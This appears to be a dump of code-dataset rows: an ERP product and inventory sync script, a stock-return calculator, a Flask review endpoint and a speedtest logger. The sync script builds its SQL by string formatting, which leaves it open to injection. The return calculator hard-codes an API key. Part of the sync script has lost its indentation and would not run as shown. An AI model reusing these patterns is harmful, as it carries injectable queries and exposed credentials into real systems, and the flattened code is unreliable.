#             engine.execute(sql)
"""
更新data_cp表中的specs_one_id和specs_two_id
删除data_cp中属性含有中文字,并把属性id同步到data_cp表中
"""
# Read the populated product_attr table.
data_product_attr = pd.read_sql_table('product_attr', engine)
# Drop records whose colour or size attribute carries Chinese characters
# (values were filtered out of specs_one / specs_two above).
for i in range(data_cp.shape[0]):
    if not data_cp.loc[i, 'specs_one'] in specs_one:
        data_cp.loc[i, 'specs_one'] = -1
    if not data_cp.loc[i, 'specs_two'] in specs_two:
        data_cp.loc[i, 'specs_two'] = -1
data_cp = data_cp[~((data_cp['specs_two'] == -1) | (data_cp['specs_one'] == -1))]
# Merge against product_attr twice to pick up the attribute id of each
# row's colour and size values.
cur = data_cp.merge(data_product_attr, left_on='specs_one', right_on='attr_name', how='left')
data_cp = cur.merge(data_product_attr, left_on='specs_two', right_on='attr_name', how='left')
data_cp = data_cp.astype(object).where(pd.notnull(data_cp), "NULL")
# Upsert SKU rows into sku_main:
"""
sku_main插入数据
需要data_cp(包括更新的product_id 和specs_id)
"""
for i in range(data_cp.shape[0]):
    with conn.cursor() as cursor:
        # sku_code is the natural key: look it up to decide insert vs update
        sql = "select sku_code from sku_main where sku_code='{0}'".format(data_cp.loc[i, 'SKU编码'])
        cursor.execute(sql)
        r = cursor.fetchone()
        # fetchone() is None when the SKU does not exist yet -> INSERT
        if r is None:
            sql = 'INSERT INTO sku_main (sku_code,product_id ,specs_one, specs_two, specs_three, ' \
                  'cost_price, cost_currency, sale_price, sale_currency,' \
                  'sku_style, primary_image, is_delete, add_time,' \
                  'secondary_images, weight, length, height, width, name,' \
                  'en_name, is_effective, zebra_sku_id) ' \
                  'VALUES ("{0}",{1},{2},{3},NULL,{4},"RMB",NULL,"USD",NULL,"{5}",{6},now(),"{7}",{8},{9},{10},{11},NULL,NULL, 1,{12})'.format(
                data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
                data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
                data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
                data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
            engine.execute(sql)
        else:
            sql = '''UPDATE sku_main SET product_id ={1},specs_one = {2},specs_two={3},cost_price={4},cost_currency="RMB", sale_currency = "USD",primary_image = "{5}",
            is_delete= {6},add_time = now(),secondary_images = "{7}", weight = {8}, length = {9},height ={10}, width = {11}, is_effective = 1,zebra_sku_id = {12}
             WHERE sku_code = "{0}"'''.format(
                data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
                data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
                data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
                data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
            engine.execute(sql)
print('刷完sku_main')
"""
插入product_tag表所有标签
需要data_cp中所有的标签集合
"""
# 设置tag list来储存所有标签属性(unique),剔除所有标签为空的records
tag = []
notnull_cp = data_cp[~(data_cp['标签'] == "NULL")]
for i in range(notnull_cp.shape[0]):
tag += str(notnull_cp.iloc[i, 4]).split(',')
tag = list(set(tag))
# 将得到的标签属性值导入到数据库的product_tag表中,得到tag对应的tag_id
# for i in range(len(tag)):
# with conn.cursor() as cursor:
# sql = '''SELECT * FROM product_tag WHERE tag_name = "{0}" '''.format(tag[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO product_tag (tag_name, add_time) VALUES ("{0}",now())'''.format(tag[i])
# engine.execute(sql)
# 设置id list和tag list 将data_cp中的id和该id对应的多个tag组成二元tuple
tr_id = []
tr_tag = []
notnull_cp = notnull_cp.reset_index()
for i in range(notnull_cp.shape[0]):
if ',' not in str(notnull_cp.loc[i, '标签']):
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(notnull_cp.loc[i, '标签'])
else:
for tags in str(notnull_cp.loc[i, '标签']).split(','):
if len(tags) > 1:
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(tags)
tuples = list(zip(tr_id, tr_tag))
# 将这两列转化为dataframe
tr = pd.DataFrame(tuples, columns=['product_id', 'tags_name'])
# 删除重复项
tr = tr.drop_duplicates()
# 读出product_tag得到tag及其对应的id,将tag_id通过tag_name合并到product_id上
product_tag = pd.read_sql_table('product_tag', engine)
tr = tr.merge(product_tag, left_on='tags_name', right_on='tag_name', how='left')
tr = tr.dropna(subset=['id'])
tr = tr.reset_index()
"""
插入product_tag_relation表所有tag_id和product_id对应关系
需要tr表(有tag_id 和 product_id 以及 tag_name)
"""
# 将tag_id,product_id写入到product_tag_relation表
for i in range(tr.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_tag_relation WHERE tag_id = {0} and product_id = {1}'''.format(tr.loc[i, 'id'], tr.loc[i, 'product_id'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_tag_relation (tag_id, product_id) VALUES ({0},{1})'''.format(
tr.loc[i, 'id'], tr.loc[i, 'product_id'])
engine.execute(sql)
print('刷完product_tag_relation')
"""
更新product中的supplier_id数据
需要supplier表和data_cp
"""
# 从数据库中读出供应商表,并筛选出supplier_name和对应的id
supplier = pd.read_sql_table('supplier', engine)
supplier = supplier[['id', 'supplier_name']]
supplier.rename(columns={'id': 'supplier_id'}, inplace=True)
# 将供应商id加到data_cp中,通过供应商名字
data_cp = data_cp.merge(supplier, left_on='默认供应商', right_on='supplier_name', how='left')
# 更新product表中的供应商id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
try:
sql = 'UPDATE product SET supplier_id ={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'supplier_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
except:
continue
print('刷完product中supplier id')
# 从数据库中读出品类,并筛选出category_name和对应的id
category = pd.read_sql_table('product_category', engine)
category = category[['id', 'category_name']]
# 删除品类中的字符串的首位空格
for i in range(data_cp.shape[0]):
data_cp.loc[i, 'category'] = trim(data_cp.loc[i, 'category'])
category.rename(columns={'id': 'category_id'}, inplace=True)
# 将品类id对应带data_cp上通过category
data_cp = data_cp.merge(category, left_on='category', right_on='category_name', how='left')
# data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
data_cp = data_cp.dropna(subset = ['category_id'])
data_cp = data_cp.reset_index()
"""
更新product表中的category_id
data_cp表中的category和product_category中的id
"""
# 更新product中的品类id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
sql = 'UPDATE product SET product_category={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'category_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
print('刷完product中product category id')
# 从数据库product表中读取供应商id和产品id
sup = pd.read_sql_table('product', engine)
sup = sup[['id', 'supplier_id']]
sup = sup[~sup['supplier_id'].isnull()][['supplier_id', 'id']]
# 删除重复项
sup = sup.drop_duplicates()
sup = sup.reset_index()
"""
插入product_supplier表中supplier_id, product_id
需要product表获取product_id和supplier_id
"""
# 将供应商id和产品id导入到product_supplier表中
for i in range(sup.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_supplier WHERE supplier_id = {0} AND product_id = {1}'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_supplier (supplier_id, product_id) VALUES ({0}, {1})'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
engine.execute(sql)
print('刷完product_supplier')
# 更新sku_id_code_dic数据库
sku_id_code_dic = data_cp[['SKUID', '系统SPUID', 'SKU编码', '成本价', '重量']]
sku_id_code_dic = sku_id_code_dic.drop_duplicates()
sku_id_code_dic = sku_id_code_dic.reset_index()
# for i in range(sku_id_code_dic.shape[0]):
# with conn.cursor() as cursor:
# # 以spu_id sku_id,为primary key 进行插入数据
# sql = "select sku_code from sku_id_code_dic where spu_id='{0}' and sku_id='{1}'".format(sku_id_code_dic.loc[i, '系统SPUID'],sku_id_code_dic.loc[i, 'SKUID'])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO sku_id_code_dic (sku_id,spu_id, sku_code, sku_price, sku_weight) VALUES ({0},{1},'{2}',{3},{4})'''.format(
# int(sku_id_code_dic.loc[i, 'SKUID']), int(sku_id_code_dic.loc[i, '系统SPUID']), sku_id_code_dic.loc[i, 'SKU编码'],
# sku_id_code_dic.loc[i, '成本价'], sku_id_code_dic.loc[i, '重量'])
# engine.execute(sql)
# --- Inventory: download the self-inventory export and sync locations -----
url = 'https://erp.banmaerp.com/Stock/SelfInventory/ExportDetailHandler'
# URL-encoded filter: sort by Quantity desc, one warehouse id, page size
# 10000, page 1.
data = 'filter=%7B%22Quantity%22%3A%7B%22Sort%22%3A-1%7D%2C%22WarehouseID%22%3A%7B%22Value%22%3A%5B%22adac18f9-a30e-4a4b-937f-ac6700e80334%22%5D%7D%2C%22Pager%22%3A%7B%22PageSize%22%3A10000%2C%22PageNumber%22%3A1%7D%7D'
r = requests.post(url=url, headers=headers, data=data)
# NOTE(review): .format() is again a no-op here (no '{}' placeholder).
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
    file.write(r.content)
d = read_table(file_name)
print(d.head())
print(d.columns)
data = xlrd.open_workbook(file_name)
os.remove(file_name)
table = data.sheets()[0]
nrows = table.nrows
col_dic = {}
index = 1
cur_test = conn.cursor()
# Map 1-based column positions to header names from the first row.
for col_index in table.row(0):
    col_dic[index] = col_index.value
    index += 1
# Walk the data rows.
for row in range(1, nrows):
    print(row)
    data_list = []
    i = 1
    col_item_dic = {}
    # Build a {header: cell value} dict for this row.
    for col in table.row(row):
        col_item_dic[col_dic[i]] = col.value
        i += 1
    # Ensure the storage location exists for warehouse 1, creating it if not.
    sql = '''select id from warehouse_location where warehouse_location_code='{0}' and warehouse_id = 1'''.format(col_item_dic['货位'])
    cur_test.execute(sql)
    r = cur_test.fetchone()
    if r is None:
        sql = '''insert into warehouse_location(warehouse_id, warehouse_location_code) values(1, '{0}')'''.format(col_item_dic['货位'])
        print(sql)
        cur_test.execute(sql)
        location_id = conn.insert_id()
        print('插入新货位成功')
        print(location_id)
        conn.commit()
    else:
        location_id = r[0]
print('刷完库位')
# Stock-quantity sync (currently disabled) -- looks up the SKU id, then
# inserts or updates the warehouse_stock row for this location:
# # 判断是否有SKU
# get_sku_id_sql = '''select id from sku_main where sku_code = '{0}' '''.format(col_item_dic['本地SKU'])
# cur_test.execute(get_sku_id_sql)
# r = cur_test.fetchone()
# if r is None:
#     print(col_item_dic['本地SKU'] + '不存在sku_main里面!!')
#     continue
# else:
#     sku_id = r[0]
# # 更新库存
# total_num = col_item_dic['库存总量'] if '库存总量' in col_item_dic else 'NULL'
# free_num = col_item_dic['合格空闲量'] if '合格空闲量' in col_item_dic else 'NULL'
# lock_num = col_item_dic['合格锁定量'] if '合格锁定量' in col_item_dic else 'NULL'
# imperfect_num = col_item_dic['残次总量'] if '残次总量' in col_item_dic else 'NULL'
#
# total_num = int(total_num) if total_num != '' else 'NULL'
# free_num = int(free_num) if free_num != '' else 'NULL'
# lock_num = int(lock_num) if lock_num != '' else 'NULL'
# imperfect_num = int(imperfect_num) if imperfect_num != '' else 'NULL'
#
# get_exist_stock = '''select id from warehouse_stock where sku_id={0} and warehouse_id = 1 and warehouse_location_id = {1}'''.format(sku_id, location_id)
# cur_test.execute(get_exist_stock)
# r = cur_test.fetchone()
# if r is None:
#     insert_sql = '''insert into warehouse_stock(sku_id,warehouse_id,warehouse_location_id,total_num,free_num,lock_num,imperfect_num)
#     values({0},1,{1},{2},{3},{4},{5})'''.format(sku_id, location_id, total_num, free_num, lock_num, imperfect_num)
#     # print(insert_sql)
#     cur_test.execute(insert_sql)
#     conn_test.commit()
# else:
#     update_sql = '''update warehouse_stock set total_num = {0}, free_num = {1}, lock_num = {2}, imperfect_num = {3}
#     where sku_id = {4} and warehouse_id = {5} and warehouse_location_id = {6}'''.format(total_num, free_num, lock_num, imperfect_num, sku_id, 1, location_id)
#     # print(update_sql)
#     cur_test.execute(update_sql)
#     conn_test.commit()
{
"api_name": "openpyxl.load_workbook",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.c... |
1119194210 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 19 11:21:13 2023
@author: nmorales
"""
from requests.auth import HTTPBasicAuth
import requests
import json
import matplotlib
import pandas as pd
import numpy as np
# Quote endpoint: 5 years of yearly data for ISIN MX01AM050019 via BIVA Cloud.
url_cotizacion = 'https://cloud.biva.mx/stock-exchange/BIVA/quote?isin=MX01AM050019&period=Y&quantity=5'
# SECURITY NOTE(review): the API key is hard-coded; move it to configuration.
headers = {"x-api-key": '5tbGgJp5Bq4yGPGaLcaUE8K7dUe83uxO94GYLjIq'}
response_cotizacion = requests.get(url=url_cotizacion, headers=headers)
data_cotizacion=response_cotizacion.json()
# Build a DataFrame from the 'timeSeries' records, indexed by epoch millis.
data_cotizacion=pd.DataFrame(data_cotizacion['timeSeries']).set_index('dateInMillis')
###########################
############################### SIMPLE RETURN
###########################
data_cotizacion['Simple_Return'] =(data_cotizacion['close']/data_cotizacion['close'].shift(1))-1 #(P1/p0)-1
print (data_cotizacion['Simple_Return'])
# NOTE(review): this count result is discarded -- probably leftover debugging.
data_cotizacion.count(axis=1)
data_cotizacion['Simple_Return'].plot(figsize=(8,5))
avg_returns_d=data_cotizacion['Simple_Return'].mean()
print(avg_returns_d)
#####################################################
## mean simple return, annualised over 250 trading days
###############################################
avg_returns_a=data_cotizacion['Simple_Return'].mean()*250
avg_returns_a_str=str(round(avg_returns_a,5)*100)+' %'
print(avg_returns_a_str) ## around 12% here: average annualised simple return
###########################
############################### Logarithmic RETURN
###########################
data_cotizacion['Logarithmic_Return'] =np.log(data_cotizacion['close']/data_cotizacion['close'].shift(1)) #(P1/p0)-1
print(data_cotizacion['Logarithmic_Return'])
#### uses today's close over yesterday's close, minus one, for the simple return
#print(PG['Simple_Return'])
#print(PG['Adj Close'])
data_cotizacion['Logarithmic_Return'].plot(figsize=(8,5))
#####################################################
## daily mean log return (tiny, well under 1%, since it is per-day)
###############################################
log_returns_d=data_cotizacion['Logarithmic_Return'].mean()
#####################################################
## mean log return, annualised over 250 trading days
###############################################
log_returns_a=data_cotizacion['Logarithmic_Return'].mean()*250
log_returns_a_str=str(round(log_returns_a,5)*100)+' %'
print(log_returns_a_str) ## around 10% here: average annualised log return
| NRMAnaya/PythonForFinance | RateOfReturn/Simple&LogarithmicReturnBIVACLOUD.py | Simple&LogarithmicReturnBIVACLOUD.py | py | 2,522 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 54,
"usage_type": "call"
}
] |
31872554645 | import os
from services.connect import *
from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from dotenv import load_dotenv
import uuid
load_dotenv()  # pull MONGO_URI etc. from a local .env file
# Blueprint the app registers under the 'reviews' name.
review_blueprint = Blueprint('reviews', __name__)
# NOTE(review): these two module constants are not referenced in this file --
# connect_mongo presumably reads its own configuration; confirm before removing.
MONGODB_CONNECTION_STRING = os.getenv("MONGO_URI")
MONGODB_DATABASE = 'ch'
# POST: create a review (the old comment said "user", which was wrong).
@review_blueprint.route('/reviews', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def create_review():
    """Create a review document in MongoDB from the posted JSON.

    Expects 'title', 'ratings' and 'content'; a missing field now yields a
    400 response instead of an uncaught KeyError (500).  The Mongo client is
    closed on every path (previously it leaked whenever a field was missing).
    """
    data = request.get_json()
    missing = [k for k in ('title', 'ratings', 'content') if k not in (data or {})]
    if missing:
        return jsonify({'error': f"missing fields: {', '.join(missing)}"}), 400
    newReview = {
        '_id': uuid.uuid4(),
        'title': data['title'],
        'ratings': data['ratings'],
        'content': data['content'],
    }
    client, collection = connect_mongo('reviews')
    try:
        collection.insert_one(newReview)
    finally:
        client.close()
    return jsonify(newReview), 201
| dp3why/dessert-service | controllers/review_controller.py | review_controller.py | py | 819 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.Blueprint",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
... |
17092139917 | import os
import speedtest_cli as speedtest
import datetime
import sqlite3
import time
from sqlite3 import Error
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
# Pull required configuration from the environment; exit early with a clear
# message if either variable is missing.
try:
    urltocheck = os.environ['UPCHECK_URLTOCHECK']
except KeyError as e:
    # os.environ raises KeyError on a missing variable, not os.error --
    # the original except clause could never fire.
    print(e)
    exit(1)
try:
    dbfile = os.environ['UPCHECK_DB_LOCATION']
except KeyError as e:
    print(e)
    exit(1)
def dbconnect(dbfile):
    """Sanity-check that the SQLite database file can be opened.

    Opens and immediately closes a connection; on failure prints the error
    and terminates the process (the service cannot run without its DB).
    """
    try:
        handle = sqlite3.connect(dbfile)
        print(sqlite3.version)
        handle.close()
    except Error as err:
        print(err)
        exit(1)
def db_createtable(dbfile):
    """Create the `upcheck` results table if it does not already exist.

    Commits and closes the connection (the original leaked it on every
    call); exits the process on any sqlite error, since the service cannot
    run without its table.
    """
    sql = 'CREATE TABLE IF NOT EXISTS upcheck (record_number integer PRIMARY KEY AUTOINCREMENT, timestamp TIMESTAMP, download INTEGER, upload INTEGER, ping INTEGER)'
    try:
        connection = sqlite3.connect(dbfile)
        try:
            connection.execute(sql)
            connection.commit()
        finally:
            connection.close()
    except Error as t:
        print(t)
        exit(1)
def write_out_record(dbfile, timestamp, download, upload, ping):
    """Append one speedtest sample to the `upcheck` table.

    Errors are reported but deliberately do not kill the service (losing a
    single sample is acceptable); the connection is now closed on every
    path instead of leaking when the INSERT raised.
    """
    try:
        connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
        try:
            cursor = connection.cursor()
            # parameterized query -- values never interpolated into the SQL
            cursor.execute("INSERT INTO upcheck VALUES (NULL, ?, ?, ?, ?)",
                           (timestamp, download, upload, ping))
            connection.commit()
        finally:
            connection.close()
    except Error as t:
        print(t)
def average(values):
    """Return the arithmetic mean of *values*.

    Raises ZeroDivisionError on an empty sequence (unchanged behaviour).
    The parameter was renamed from ``input``, which shadowed the builtin;
    every call site in this file passes it positionally.
    """
    return sum(values) / len(values)
def get_average_data():
    """Return [avg_download, avg_upload, avg_ping] over the last 24 hours.

    Reads from the module-level ``dbfile``; each average is rounded to two
    decimal places.  The original repeated the same query/average block
    three times and never closed the connection; this factors the block
    into a helper and closes the connection in a ``finally``.
    """
    yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
    connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
    try:
        cursor = connection.cursor()

        def _column_average(column):
            # Average one column over the last 24h.  The column name comes
            # from the fixed whitelist below, never from user input.
            cursor.execute(
                "SELECT {} FROM upcheck WHERE timestamp > ?".format(column),
                (yesterday,))
            values = [row[0] for row in cursor.fetchall()]
            return round(average(values), 2)

        return [_column_average(c) for c in ("download", "upload", "ping")]
    finally:
        connection.close()
def run_speedtest():
    """Run a full speedtest (server selection, download, upload) and return
    the library's results object."""
    tester = speedtest.Speedtest()
    tester.get_servers()
    tester.get_best_server()
    tester.download()
    tester.upload()
    return tester.results
def bits_to_bytes(inputvalue):
    """Convert a bits-per-second figure to megabits, as a 2-decimal string.

    NOTE(review): despite the name, this converts bits to *megabits*
    (divide by 1e6) -- bytes are never involved.  Renaming would break
    callers, so the misnomer is only documented here.
    """
    return format(inputvalue / 1000000, '.2f')
def primary_operation():
    """Run one speedtest, persist the sample, and publish the 24h averages
    as an XML file for the web server (module-level ``xml_web_output``)."""
    print("Running Speedtest")
    stest_result = run_speedtest()
    download_speed = str(bits_to_bytes(stest_result.download))
    upload_speed = str(bits_to_bytes(stest_result.upload))
    ping = str(stest_result.ping)
    timestamp = datetime.datetime.now()
    write_out_record(dbfile, timestamp, download_speed, upload_speed, ping)
    # Fetch the averages once -- the original ran the full DB aggregation
    # three times, once per field.
    averages = get_average_data()
    average_dl, average_ul, average_ping = (str(v) for v in averages)
    xml_root = Element('SpeedtestResults')
    SubElement(xml_root, "average_dl").text = average_dl
    SubElement(xml_root, "average_ul").text = average_ul
    SubElement(xml_root, "average_ping").text = average_ping
    xml_output = ElementTree.tostring(xml_root, encoding='unicode')
    # `with` closes the handle -- the original leaked it, risking unflushed
    # output served by nginx.
    with open(xml_web_output, "w") as xml_output_file:
        xml_output_file.write(xml_output)
# XML location served by nginx.
xml_web_output = "/usr/share/nginx/html/upcheck-speedtest.xml"
# Startup checks.  Note: dbconnect/db_createtable already call exit(1) on
# sqlite errors internally; these outer handlers are belt-and-braces.
try:
    dbconnect(dbfile)
except Error as e:
    print("Could not connect to database")
    print(e)
    exit(1)
try:
    db_createtable(dbfile)
    print("UpCheck Scheduled Tasks are Active")
except Error as e:
    print("Unable to Create Table")
    print(e)
    exit(1)
# Run one measurement every 3000 seconds (50 minutes), forever.
while True:
    primary_operation()
    time.sleep(3000)
| overallcoma/upcheck | upcheck-client/upcheck-client-scheduledtasks.py | upcheck-client-scheduledtasks.py | py | 4,428 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.error",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.error",
"line_nu... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.